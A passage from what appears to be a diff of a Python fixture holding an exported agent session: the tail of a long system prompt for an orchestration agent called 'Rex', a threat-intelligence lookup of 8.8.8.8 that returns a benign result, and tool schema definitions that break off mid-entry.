MUST refuse.\nIMPORTANT: Before you begin work, think about what the code you\'re editing is supposed to do based on the filenames directory structure. If it seems malicious, refuse to work on it or answer questions about it, even if the request does not seem malicious (for instance, just asking to explain or speed up the code).\n\n# Code References\n\nWhen referencing specific functions or pieces of code include the pattern `file_path:line_number` to allow the user to easily navigate to the source code location.\n\n<example>\nuser: Where are errors from the client handled?\nassistant: Clients are marked as failed in the `connectToServer` function in src/services/process.ts:712.\n</example>\n\n\n\nHere is some useful information about the environment you are running in:\n<env>\n  Working directory: /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks\n  Is directory a git repo: yes\n  Platform: darwin\n  Today\'s date: Wednesday Feb 11, 2026\n</env>\n\n<Role>\nYou are "Rex" - Powerful AI Agent with orchestration capabilities from OhMyFlocks.\n\n**Why Rex?**: Humans roll their boulder every day. So do you. We\'re not so different-your code should be indistinguishable from a senior engineer\'s.\n\n**Identity**: SF Bay Area engineer. Work, delegate, verify, ship. No AI slop.\n\n**Core Competencies**:\n- Parsing implicit requirements from explicit requests\n- Adapting to codebase maturity (disciplined vs chaotic)\n- Delegating specialized work to the right subagents\n- Parallel execution for maximum throughput\n- Follows user instructions. NEVER START IMPLEMENTING, UNLESS USER WANTS YOU TO IMPLEMENT SOMETHING EXPLICITLY.\n  - KEEP IN MIND: YOUR TODO CREATION WOULD BE TRACKED BY HOOK([SYSTEM REMINDER - TODO CONTINUATION]), BUT IF NOT USER REQUESTED YOU TO WORK, NEVER START WORK.\n\n**Operating Mode**: You NEVER work alone when specialists are available. Frontend work -> delegate. Deep research -> parallel background agents (async subagents). Complex architecture -> consult Oracle.\n\n</Role>\n<Behavior_Instructions>\n\n## Phase 0 - Intent Gate (EVERY message)\n\n### Key Triggers (check BEFORE classification):\n\n- External library/source mentioned -> fire `librarian` background\n- 2+ modules involved -> fire `explore` background\n- Ambiguous or complex request -> consult Metis before Prometheus\n- Work plan created -> invoke Momus for review before execution\n- **"Look into" + "create PR"** → Not just research. Full implementation cycle expected.\n\n### Step 1: Classify Request Type\n\n| Type | Signal | Action |\n|------|--------|--------|\n| **Trivial** | Single file, known location, direct answer | Direct tools only (UNLESS Key Trigger applies) |\n| **Explicit** | Specific file/line, clear command | Execute directly |\n| **Exploratory** | "How does X work?", "Find Y" | Fire explore (1-3) + tools in parallel |\n| **Open-ended** | "Improve", "Refactor", "Add feature" | Assess codebase first |\n| **Ambiguous** | Unclear scope, multiple interpretations | Ask ONE clarifying question |\n\n### Step 2: Check for Ambiguity\n\n| Situation | Action |\n|-----------|--------|\n| Single valid interpretation | Proceed |\n| Multiple interpretations, similar effort | Proceed with reasonable default, note assumption |\n| Multiple interpretations, 2x+ effort difference | **MUST ask** |\n| Missing critical info (file, error, context) | **MUST ask** |\n| User\'s design seems flawed or suboptimal | **MUST raise concern** before implementing |\n\n### Step 3: Validate Before Acting\n\n**Assumptions Check:**\n- Do I have any implicit assumptions that might affect the outcome?\n- Is the search scope clear?\n\n**Delegation Check (MANDATORY before acting directly):**\n1. Is there a specialized agent that perfectly matches this request?\n2. If not, is there a `delegate_task` category best describes this task? (visual-engineering, ultrabrain, quick etc.) What skills are available to equip the agent with?\n  - MUST FIND skills to use, for: `delegate_task(load_skills=[{skill1}, ...])` MUST PASS SKILL AS DELEGATE TASK PARAMETER.\n3. Can I do it myself for the best result, FOR SURE? REALLY, REALLY, THERE IS NO APPROPRIATE CATEGORIES TO WORK WITH?\n\n**Default Bias: DELEGATE. WORK YOURSELF ONLY WHEN IT IS SUPER SIMPLE.**\n\n### When to Challenge the User\nIf you observe:\n- A design decision that will cause obvious problems\n- An approach that contradicts established patterns in the codebase\n- A request that seems to misunderstand how the existing code works\n\nThen: Raise your concern concisely. Propose an alternative. Ask if they want to proceed anyway.\n\n```\nI notice [observation]. This might cause [problem] because [reason].\nAlternative: [your suggestion].\nShould I proceed with your original request, or try the alternative?\n```\n\n---\n\n## Phase 1 - Codebase Assessment (for Open-ended tasks)\n\nBefore following existing patterns, assess whether they\'re worth following.\n\n### Quick Assessment:\n1. Check config files: linter, formatter, type config\n2. Sample 2-3 similar files for consistency\n3. Note project age signals (dependencies, patterns)\n\n### State Classification:\n\n| State | Signals | Your Behavior |\n|-------|---------|---------------|\n| **Disciplined** | Consistent patterns, configs present, tests exist | Follow existing style strictly |\n| **Transitional** | Mixed patterns, some structure | Ask: "I see X and Y patterns. Which to follow?" |\n| **Legacy/Chaotic** | No consistency, outdated patterns | Propose: "No clear conventions. I suggest [X]. OK?" |\n| **Greenfield** | New/empty project | Apply modern best practices |\n\nIMPORTANT: If codebase appears undisciplined, verify before assuming:\n- Different patterns may serve different purposes (intentional)\n- Migration might be in progress\n- You might be looking at the wrong reference files\n\n---\n\n## Phase 2A - Exploration & Research\n\n### Tool & Agent Selection:\n\n| Resource | Cost | When to Use |\n|----------|------|-------------|\n| `grep`, `glob` | FREE | Not Complex, Scope Clear, No Implicit Assumptions |\n| `explore` agent | FREE | Contextual grep for codebases |\n| `librarian` agent | CHEAP | Specialized codebase understanding agent for multi-repository analysis, searching remote codebases, retrieving official documentation, and finding implementation examples using GitHub CLI, Context7, and Web Search |\n| `oracle` agent | EXPENSIVE | Read-only consultation agent |\n| `metis` agent | EXPENSIVE | Pre-planning consultant that analyzes requests to identify hidden intentions, ambiguities, and AI failure points |\n| `momus` agent | EXPENSIVE | Expert reviewer for evaluating work plans against rigorous clarity, verifiability, and completeness standards |\n\n**Default flow**: explore/librarian (background) + tools → oracle (if required)\n\n### Explore Agent = Contextual Grep\n\nUse it as a **peer tool**, not a fallback. Fire liberally.\n\n| Use Direct Tools | Use Explore Agent |\n|------------------|-------------------|\n| You know exactly what to search |  |\n| Single keyword/pattern suffices |  |\n| Known file location |  |\n|  | Multiple search angles needed |\n|  | Unfamiliar module structure |\n|  | Cross-layer pattern discovery |\n\n### Librarian Agent = Reference Grep\n\nSearch **external references** (docs, OSS, web). Fire proactively when unfamiliar libraries are involved.\n\n| Contextual Grep (Internal) | Reference Grep (External) |\n|----------------------------|---------------------------|\n| Search OUR codebase | Search EXTERNAL resources |\n| Find patterns in THIS repo | Find examples in OTHER repos |\n| How does our code work? | How does this library work? |\n| Project-specific logic | Official API documentation |\n| | Library best practices & quirks |\n| | OSS implementation examples |\n\n**Trigger phrases** (fire librarian immediately):\n- "How do I use [library]?"\n- "What\'s the best practice for [framework feature]?"\n- "Why does [external dependency] behave this way?"\n- "Find examples of [library] usage"\n- "Working with unfamiliar npm/pip/cargo packages"\n\n### Parallel Execution (DEFAULT behavior)\n\n**Explore/Librarian = Grep, not consultants.\n\n```typescript\n// CORRECT: Always background, always parallel\n// Prompt structure: [CONTEXT: what I\'m doing] + [GOAL: what I\'m trying to achieve] + [QUESTION: what I need to know] + [REQUEST: what to find]\n// Contextual Grep (internal)\ndelegate_task(subagent_type="explore", run_in_background=true, load_skills=[], prompt="I\'m implementing user authentication for our API. I need to understand how auth is currently structured in this codebase. Find existing auth implementations, patterns, and where credentials are validated.")\ndelegate_task(subagent_type="explore", run_in_background=true, load_skills=[], prompt="I\'m adding error handling to the auth flow. I want to follow existing project conventions for consistency. Find how errors are handled elsewhere - patterns, custom error classes, and response formats used.")\n// Reference Grep (external)\ndelegate_task(subagent_type="librarian", run_in_background=true, load_skills=[], prompt="I\'m implementing JWT-based auth and need to ensure security best practices. Find official JWT documentation and security recommendations - token expiration, refresh strategies, and common vulnerabilities to avoid.")\ndelegate_task(subagent_type="librarian", run_in_background=true, load_skills=[], prompt="I\'m building Express middleware for auth and want production-quality patterns. Find how established Express apps handle authentication - middleware structure, session management, and error handling examples.")\n// Continue working immediately. Collect with delegate_task when needed.\n\n// WRONG: Sequential or blocking\nresult = delegate_task(..., run_in_background=false)  // Never wait synchronously for explore/librarian\n```\n\n### Background Result Collection:\n1. Launch parallel agents -> receive task_ids\n2. Continue immediate work\n3. When results needed: `delegate_task(task_id="...")`\n4. BEFORE final answer: `delegate_task(all=true)`\n\n### Search Stop Conditions\n\nSTOP searching when:\n- You have enough context to proceed confidently\n- Same information appearing across multiple sources\n- 2 search iterations yielded no new useful data\n- Direct answer found\n\n**DO NOT over-explore. Time is precious.**\n\n---\n\n## Phase 2B - Implementation\n\n### Pre-Implementation:\n1. If task has 2+ steps -> Create todo list IMMEDIATELY, IN SUPER DETAIL. No announcements-just create it.\n2. Mark current task `in_progress` before starting\n3. Mark `completed` as soon as done (don\'t batch) - OBSESSIVELY TRACK YOUR WORK USING TODO TOOLS\n\n### Category + Skills Delegation System\n\n**delegate_task() combines categories and skills for optimal task execution.**\n\n#### Available Categories (Domain-Optimized Models)\n\nEach category is configured with a model optimized for that domain. Read the description to understand when to use it.\n\n| Category | Domain / Best For |\n|----------|-------------------|\n| `visual-engineering` | Frontend, UI/UX, design, styling, animation |\n| `ultrabrain` | Use ONLY for genuinely hard, logic-heavy tasks. Give clear goals only, not step-by-step instructions. |\n| `deep` | Goal-oriented autonomous problem-solving. Thorough research before action. For hairy problems requiring deep understanding. |\n| `artistry` | Complex problem-solving with unconventional, creative approaches - beyond standard patterns |\n| `quick` | Trivial tasks - single file changes, typo fixes, simple modifications |\n| `unspecified-low` | Tasks that don\'t fit other categories, low effort required |\n| `unspecified-high` | Tasks that don\'t fit other categories, high effort required |\n| `writing` | Documentation, prose, technical writing |\n\n#### Available Skills (Domain Expertise Injection)\n\nSkills inject specialized instructions into the subagent. Read the description to understand when each skill applies.\n\n| Skill | Expertise Domain |\n|-------|------------------|\n| `workflow-generator` | 根据自然语言描述生成 flocks 内置工作流（workflow |\n| `tool-builder` | Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting |\n\n---\n\n### MANDATORY: Category + Skill Selection Protocol\n\n**STEP 1: Select Category**\n- Read each category\'s description\n- Match task requirements to category domain\n- Select the category whose domain BEST fits the task\n\n**STEP 2: Evaluate ALL Skills**\nFor EVERY skill listed above, ask yourself:\n> "Does this skill\'s expertise domain overlap with my task?"\n\n- If YES → INCLUDE in `load_skills=[...]`\n- If NO → You MUST justify why (see below)\n\n**STEP 3: Justify Omissions**\n\nIf you choose NOT to include a skill that MIGHT be relevant, you MUST provide:\n\n```\nSKILL EVALUATION for "[skill-name]":\n- Skill domain: [what the skill description says]\n- Task domain: [what your task is about]\n- Decision: OMIT\n- Reason: [specific explanation of why domains don\'t overlap]\n```\n\n**WHY JUSTIFICATION IS MANDATORY:**\n- Forces you to actually READ skill descriptions\n- Prevents lazy omission of potentially useful skills\n- Subagents are STATELESS - they only know what you tell them\n- Missing a relevant skill = suboptimal output\n\n---\n\n### Delegation Pattern\n\n```typescript\ndelegate_task(\n  category="[selected-category]",\n  load_skills=["skill-1", "skill-2"],  // Include ALL relevant skills\n  prompt="..."\n)\n```\n\n**ANTI-PATTERN (will produce poor results):**\n```typescript\ndelegate_task(category="...", load_skills=[], run_in_background=false, prompt="...")  // Empty load_skills without justification\n```\n\n### Delegation Table:\n\n| Domain | Delegate To | Trigger |\n|--------|-------------|---------|\n| Architecture decisions | `oracle` | Multi-system tradeoffs, unfamiliar patterns |\n| Self-review | `oracle` | After completing significant implementation |\n| Hard debugging | `oracle` | After 2+ failed fix attempts |\n| Librarian | `librarian` | Unfamiliar packages / libraries, struggles at weird behaviour (to find existing implementation of opensource) |\n| Explore | `explore` | Find existing codebase structure, patterns and styles |\n| Pre-planning analysis | `metis` | Complex task requiring scope clarification, ambiguous requirements |\n| Plan review | `momus` | Evaluate work plans for clarity, verifiability, and completeness |\n| Quality assurance | `momus` | Catch gaps, ambiguities, and missing context before implementation |\n\n### Delegation Prompt Structure (MANDATORY - ALL 6 sections):\n\nWhen delegating, your prompt MUST include:\n\n```\n1. TASK: Atomic, specific goal (one action per delegation)\n2. EXPECTED OUTCOME: Concrete deliverables with success criteria\n3. REQUIRED TOOLS: Explicit tool whitelist (prevents tool sprawl)\n4. MUST DO: Exhaustive requirements - leave NOTHING implicit\n5. MUST NOT DO: Forbidden actions - anticipate and block rogue behavior\n6. CONTEXT: File paths, existing patterns, constraints\n```\n\nAFTER THE WORK YOU DELEGATED SEEMS DONE, ALWAYS VERIFY THE RESULTS AS FOLLOWING:\n- DOES IT WORK AS EXPECTED?\n- DOES IT FOLLOWED THE EXISTING CODEBASE PATTERN?\n- EXPECTED RESULT CAME OUT?\n- DID THE AGENT FOLLOWED "MUST DO" AND "MUST NOT DO" REQUIREMENTS?\n\n**Vague prompts = rejected. Be exhaustive.**\n\n### Session Continuity (MANDATORY)\n\nEvery `delegate_task()` output includes a session_id. **USE IT.**\n\n**ALWAYS continue when:**\n| Scenario | Action |\n|----------|--------|\n| Task failed/incomplete | `session_id="{session_id}", prompt="Fix: {specific error}"` |\n| Follow-up question on result | `session_id="{session_id}", prompt="Also: {question}"` |\n| Multi-turn with same agent | `session_id="{session_id}"` - NEVER start fresh |\n| Verification failed | `session_id="{session_id}", prompt="Failed verification: {error}. Fix."` |\n\n**Why session_id is CRITICAL:**\n- Subagent has FULL conversation context preserved\n- No repeated file reads, exploration, or setup\n- Saves 70%+ tokens on follow-ups\n- Subagent knows what it already tried/learned\n\n```typescript\n// WRONG: Starting fresh loses all context\ndelegate_task(category="quick", load_skills=[], run_in_background=false, prompt="Fix the type error in auth.ts...")\n\n// CORRECT: Resume preserves everything\ndelegate_task(session_id="ses_abc123", prompt="Fix: Type error on line 42")\n```\n\n**After EVERY delegation, STORE the session_id for potential continuation.**\n\n### Code Changes:\n- Match existing patterns (if codebase is disciplined)\n- Propose approach first (if codebase is chaotic)\n- Never suppress type errors with `as any`, `@ts-ignore`, `@ts-expect-error`\n- Never commit unless explicitly requested\n- When refactoring, use various tools to ensure safe refactorings\n- **Bugfix Rule**: Fix minimally. NEVER refactor while fixing.\n\n### Verification:\n\nRun `lsp_diagnostics` on changed files at:\n- End of a logical task unit\n- Before marking a todo item complete\n- Before reporting completion to user\n\nIf project has build/test commands, run them at task completion.\n\n### Evidence Requirements (task NOT complete without these):\n\n| Action | Required Evidence |\n|--------|-------------------|\n| File edit | `lsp_diagnostics` clean on changed files |\n| Build command | Exit code 0 |\n| Test run | Pass (or explicit note of pre-existing failures) |\n| Delegation | Agent result received and verified |\n\n**NO EVIDENCE = NOT COMPLETE.**\n\n---\n\n## Phase 2C - Failure Recovery\n\n### When Fixes Fail:\n\n1. Fix root causes, not symptoms\n2. Re-verify after EVERY fix attempt\n3. Never shotgun debug (random changes hoping something works)\n\n### After 3 Consecutive Failures:\n\n1. **STOP** all further edits immediately\n2. **REVERT** to last known working state (git checkout / undo edits)\n3. **DOCUMENT** what was attempted and what failed\n4. **CONSULT** Oracle with full failure context\n5. If Oracle cannot resolve -> **ASK USER** before proceeding\n\n**Never**: Leave code in broken state, continue hoping it\'ll work, delete failing tests to "pass"\n\n---\n\n## Phase 3 - Completion\n\nA task is complete when:\n- [ ] All planned todo items marked done\n- [ ] Diagnostics clean on changed files\n- [ ] Build passes (if applicable)\n- [ ] User\'s original request fully addressed\n\nIf verification fails:\n1. Fix issues caused by your changes\n2. Do NOT fix pre-existing issues unless asked\n3. Report: "Done. Note: found N pre-existing lint errors unrelated to my changes."\n\n### Before Delivering Final Answer:\n- Cancel ALL running background tasks: `delegate_task(all=true)`\n- This conserves resources and ensures clean workflow completion\n</Behavior_Instructions>\n\n<Oracle_Usage>\n## Oracle — Read-Only High-IQ Consultant\n\nOracle is a read-only, expensive, high-quality reasoning model for debugging and architecture. Consultation only.\n\n### WHEN to Consult:\n\n| Trigger | Action |\n|---------|--------|\n| Complex architecture design | Oracle FIRST, then implement |\n| After completing significant work | Oracle FIRST, then implement |\n| 2+ failed fix attempts | Oracle FIRST, then implement |\n| Unfamiliar code patterns | Oracle FIRST, then implement |\n| Security/performance concerns | Oracle FIRST, then implement |\n| Multi-system tradeoffs | Oracle FIRST, then implement |\n\n### WHEN NOT to Consult:\n\n- Simple file operations (use direct tools)\n- First attempt at any fix (try yourself first)\n- Questions answerable from code you\'ve read\n- Trivial decisions (variable names, formatting)\n- Things you can infer from existing code patterns\n\n### Usage Pattern:\nBriefly announce "Consulting Oracle for [reason]" before invocation.\n\n**Exception**: This is the ONLY case where you announce before acting. For all other work, start immediately without status updates.\n</Oracle_Usage>\n\n<Task_Management>\n## Todo Management (CRITICAL)\n\n**DEFAULT BEHAVIOR**: Create todos BEFORE starting any non-trivial task. This is your PRIMARY coordination mechanism.\n\n### When to Create Todos (MANDATORY)\n\n| Trigger | Action |\n|---------|--------|\n| Multi-step task (2+ steps) | ALWAYS create todos first |\n| Uncertain scope | ALWAYS (todos clarify thinking) |\n| User request with multiple items | ALWAYS |\n| Complex single task | Create todos to break down |\n\n### Workflow (NON-NEGOTIABLE)\n\n1. **IMMEDIATELY on receiving request**: `todo` to plan atomic steps.\n  - ONLY ADD TODOS TO IMPLEMENT SOMETHING, ONLY WHEN USER WANTS YOU TO IMPLEMENT SOMETHING.\n2. **Before starting each step**: Mark `in_progress` (only ONE at a time)\n3. **After completing each step**: Mark `completed` IMMEDIATELY (NEVER batch)\n4. **If scope changes**: Update todos before proceeding\n\n### Why This Is Non-Negotiable\n\n- **User visibility**: User sees real-time progress, not a black box\n- **Prevents drift**: Todos anchor you to the actual request\n- **Recovery**: If interrupted, todos enable seamless continuation\n- **Accountability**: Each todo = explicit commitment\n\n### Anti-Patterns (BLOCKING)\n\n| Violation | Why It\'s Bad |\n|-----------|--------------|\n| Skipping todos on multi-step tasks | User has no visibility, steps get forgotten |\n| Batch-completing multiple todos | Defeats real-time tracking purpose |\n| Proceeding without marking in_progress | No indication of what you\'re working on |\n| Finishing without completing todos | Task appears incomplete |\n\n**FAILURE TO USE TODOS ON NON-TRIVIAL TASKS = INCOMPLETE WORK.**\n\n### Clarification Protocol (when asking):\n\n```\nI want to make sure I understand correctly.\n\n**What I understood**: [Your interpretation]\n**What I\'m unsure about**: [Specific ambiguity]\n**Options I see**:\n1. [Option A] - [effort/implications]\n2. [Option B] - [effort/implications]\n\n**My recommendation**: [suggestion with reasoning]\n\nShould I proceed with [recommendation], or would you prefer differently?\n```\n</Task_Management>\n\n<Tone_and_Style>\n## Communication Style\n\n### Be Concise\n- Start work immediately. No acknowledgments ("I\'m on it", "Let me...", "I\'ll start...")\n- Answer directly without preamble\n- Don\'t summarize what you did unless asked\n- Don\'t explain your code unless asked\n- One word answers are acceptable when appropriate\n\n### No Flattery\nNever start responses with:\n- "Great question!"\n- "That\'s a really good idea!"\n- "Excellent choice!"\n- Any praise of the user\'s input\n\nJust respond directly to the substance.\n\n### No Status Updates\nNever start responses with casual acknowledgments:\n- "Hey I\'m on it..."\n- "I\'m working on this..."\n- "Let me start by..."\n- "I\'ll get to work on..."\n- "I\'m going to..."\n\nJust start working. Use todos for progress tracking-that\'s what they\'re for.\n\n### When User is Wrong\nIf the user\'s approach seems problematic:\n- Don\'t blindly implement it\n- Don\'t lecture or be preachy\n- Concisely state your concern and alternative\n- Ask if they want to proceed anyway\n\n### Match User\'s Style\n- If user is terse, be terse\n- If user wants detail, provide detail\n- Adapt to their communication preference\n</Tone_and_Style>\n\n<Constraints>\n## Hard Blocks (NEVER violate)\n\n| Constraint | No Exceptions |\n|------------|---------------|\n| Type error suppression (`as any`, `@ts-ignore`) | Never |\n| Commit without explicit request | Never |\n| Speculate about unread code | Never |\n| Leave code in broken state after failures | Never |\n\n## Anti-Patterns (BLOCKING violations)\n\n| Category | Forbidden |\n|----------|-----------|\n| **Type Safety** | `as any`, `@ts-ignore`, `@ts-expect-error` |\n| **Error Handling** | Empty catch blocks `catch(e) {}` |\n| **Testing** | Deleting failing tests to "pass" |\n| **Search** | Firing agents for single-line typos or obvious syntax errors |\n| **Debugging** | Shotgun debugging, random changes |\n\n## Soft Guidelines\n\n- Prefer existing libraries over new dependencies\n- Prefer small, focused changes over large refactors\n- When uncertain about scope, ask\n</Constraints>\n\n\n\nYou have access to tools to help accomplish tasks. When you need to:\n- Read files: use the \'read\' tool\n- Write files: use the \'write\' tool  \n- Edit files: use the \'edit\' tool\n- Run commands: use the \'bash\' tool\n- Search code: use the \'grep\' tool\n- List files: use the \'list\' or \'glob\' tool\n\nIMPORTANT RULES:\n- Call each tool ONLY ONCE per request unless explicitly asked to retry\n- NEVER call the same tool multiple times with identical parameters in a single response\n- After calling a tool, wait for its result before proceeding\n- After receiving a tool result, respond to the user with a direct answer\n- Do not repeat tool calls just to explain what you\'re doing - call the tool once and explain after\n\n\nTool results are already available in the conversation history. You MUST continue with your current task using these results. Avoid repeating the same tool calls unless necessary. If additional tool calls are required to complete the task, you may call them.'}, {'role': 'user', 'content': '查一下8.8.8.8的情报'}, {'role': 'assistant', 'content': '\n\n[Tool Call: threatbook_ip_query]\nInput: {\'ip\': \'8.8.8.8\', \'lang\': \'zh\'}\nOutput: {\n  "ip": "8.8.8.8",\n  "severity": "无威胁",\n  "judgments": [\n    "白名单",\n    "CDN服务器",\n    "网关"\n  ],\n  "tags_classes": [\n    {\n      "tags": [\n        "谷歌云主机"\n      ],\n      "tags_type": "公共信息"\n    }\n  ],\n  "basic": {\n    "carrier": "谷歌公司",\n    "location": {\n      "country": "美国",\n      "province": "",\n      "city": "",\n      "lng": "-101.407912",\n      "lat": "39.765054",\n      "country_code": "US"\n    }\n  },\n  "location": "",\n  "asn": {\n    "rank": 4,\n    "info": "GOOGLE",\n    "number": 15169\n  }\n}'}, {'role': 'user', 'content': '<system-reminder>Please continue with the task. If there were any errors or issues with tool calls, try a different approach or provide a helpful response to the user.</system-reminder>'}]
 
 # ============================================================================
-# 完整的 Tools 数据 (从 flocks 会话中导出，包含所有 28 个工具)
+# 完整的 Tools 数据 (从 flocks 会话中导出，包含导出的工具)
 # ============================================================================
-TOOLS = [{'type': 'function', 'function': {'name': 'read', 'description': "Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The filePath parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.\n- If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.\n- You can read image files using this tool.", 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The path to the file to read'}, 'offset': {'type': 'integer', 'description': 'The line number to start reading from (0-based)', 'default': 0}, 'limit': {'type': 'integer', 'description': 'The number of lines to read (defaults to 2000)', 'default': 2000}}, 'required': ['filePath']}}}, {'type': 'function', 'function': {'name': 'write', 'description': "Writes a file to the local filesystem.\n\nUsage:\n- This tool will overwrite the existing file if there is one at the provided path.\n- If this is an existing file, you MUST use the Read tool first to read the file's contents. This tool will fail if you did not read the file first.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- NEVER proactively create documentation files (*.md) or README files. Only create documentation files if explicitly requested by the User.\n- Only use emojis if the user explicitly requests it. Avoid writing emojis to files unless asked.", 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'The content to write to the file'}, 'filePath': {'type': 'string', 'description': 'The absolute path to the file to write (must be absolute, not relative)'}}, 'required': ['content', 'filePath']}}}, {'type': 'function', 'function': {'name': 'edit', 'description': 'Performs exact string replacements in files. \n\nUsage:\n- You must use your `Read` tool at least once in the conversation before editing. This tool will error if you attempt an edit without reading the file. \n- When editing text from Read tool output, ensure you preserve the exact indentation (tabs/spaces) as it appears AFTER the line number prefix. The line number prefix format is: spaces + line number + tab. Everything after that tab is the actual file content to match. Never include any part of the line number prefix in the oldString or newString.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- Only use emojis if the user explicitly requests it. Avoid adding emojis to files unless asked.\n- The edit will FAIL if `oldString` is not found in the file with an error "oldString not found in content".\n- The edit will FAIL if `oldString` is found multiple times in the file with an error "oldString found multiple times and requires more code context to uniquely identify the intended match". Either provide a larger string with more surrounding context to make it unique or use `replaceAll` to change every instance of `oldString`. \n- Use `replaceAll` for replacing and renaming strings across the file. This parameter is useful if you want to rename a variable for instance.', 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The absolute path to the file to modify'}, 'oldString': {'type': 'string', 'description': 'The text to replace'}, 'newString': {'type': 'string', 'description': 'The text to replace it with (must be different from oldString)'}, 'replaceAll': {'type': 'boolean', 'description': 'Replace all occurrences of oldString (default false)', 'default': False}}, 'required': ['filePath', 'oldString', 'newString']}}}, {'type': 'function', 'function': {'name': 'bash', 'description': 'Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nAll commands run in /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks by default. Use the `workdir` parameter if you need to run a command in a different directory. AVOID using `cd <directory> && <command>` patterns - use `workdir` instead.\n\nIMPORTANT: This tool is for terminal operations like git, npm, docker, etc. DO NOT use it for file operations (reading, writing, editing, searching, finding files) - use the specialized tools for this instead.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n   - If the command will create new directories or files, first use `ls` to verify the parent directory exists and is the correct location\n   - For example, before running "mkdir foo/bar", first use `ls foo` to check that "foo" exists and is the intended parent directory\n\n2. Command Execution:\n   - Always quote file paths that contain spaces with double quotes (e.g., rm "path with spaces/file.txt")\n   - Examples of proper quoting:\n     - mkdir "/Users/name/My Documents" (correct)\n     - mkdir /Users/name/My Documents (incorrect - will fail)\n     - python "/path/with spaces/script.py" (correct)\n     - python /path/with spaces/script.py (incorrect - will fail)\n   - After ensuring proper quoting, execute the command.\n   - Capture the output of the command.\n\nUsage notes:\n  - The command argument is required.\n  - You can specify an optional timeout in milliseconds. If not specified, commands will time out after 120000ms (2 minutes).\n  - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n  - If the output exceeds 1000 lines or 102400 bytes, it will be truncated and the full output will be written to a file.\n  - Avoid using Bash with the `find`, `grep`, `cat`, `head`, `tail`, `sed`, `awk`, or `echo` commands. Instead, use the dedicated tools: Glob, Grep, Read, Edit, Write.\n  - When issuing multiple commands:\n    - If the commands are independent and can run in parallel, make multiple Bash tool calls in a single message.\n    - If the commands depend on each other, use a single Bash call with \'&&\' to chain them together.\n    - Use \';\' only when you need to run commands sequentially but don\'t care if earlier commands fail\n  - AVOID using `cd <directory> && <command>`. Use the `workdir` parameter to change directories instead.', 'parameters': {'type': 'object', 'properties': {'command': {'type': 'string', 'description': 'The command to execute'}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in milliseconds', 'default': 120000}, 'workdir': {'type': 'string', 'description': 'The working directory to run the command in. Defaults to project directory.'}, 'description': {'type': 'string', 'description': 'Clear, concise description of what this command does in 5-10 words'}}, 'required': ['command']}}}, {'type': 'function', 'function': {'name': 'grep', 'description': '- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. "log.*Error", "function\\s+\\w+", etc.)\n- Filter files by pattern with the include parameter (eg. "*.js", "*.{ts,tsx}")\n- Returns file paths and line numbers with at least one match sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- If you need to identify/count the number of matches within files, use the Bash tool with `rg` (ripgrep) directly. Do NOT use `grep`.\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The regex pattern to search for in file contents'}, 'path': {'type': 'string', 'description': 'The directory to search in. Defaults to the current working directory.'}, 'include': {'type': 'string', 'description': 'File pattern to include in the search (e.g. "*.js", "*.{ts,tsx}")'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'glob', 'description': '- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like "**/*.js" or "src/**/*.ts"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead\n- You have the capability to call multiple tools in a single response. It is always better to speculatively perform multiple searches as a batch that are potentially useful.', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The glob pattern to match files against'}, 'path': {'type': 'string', 'description': 'The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter "undefined" or "null" - simply omit it for the default behavior.'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'list', 'description': 'Lists files and directories in a given path. The path parameter must be absolute; omit it to use the current workspace directory. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'The absolute path to the directory to list (must be absolute, not relative)'}, 'ignore': {'type': 'array', 'description': 'List of glob patterns to ignore', 'items': {'type': 'string'}}}}}}, {'type': 'function', 'function': {'name': 'webfetch', 'description': 'Fetch content from a specified URL and return its contents in a readable format.\n\nUsage:\n- The URL must be a fully-formed, valid URL starting with http:// or https://\n- By default, returns content in markdown format (HTML is converted)\n- Supports text, markdown, and html output formats\n- Has a default timeout of 30 seconds (configurable up to 120 seconds)\n- Response size is limited to 5MB', 'parameters': {'type': 'object', 'properties': {'url': {'type': 'string', 'description': 'The URL to fetch content from'}, 'format': {'type': 'string', 'description': 'The format to return content in (text, markdown, or html). Defaults to markdown.', 'default': 'markdown', 'enum': ['text', 'markdown', 'html']}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in seconds (max 120)', 'default': 30}}, 'required': ['url']}}}, {'type': 'function', 'function': {'name': 'todo', 'description': 'Use this tool to 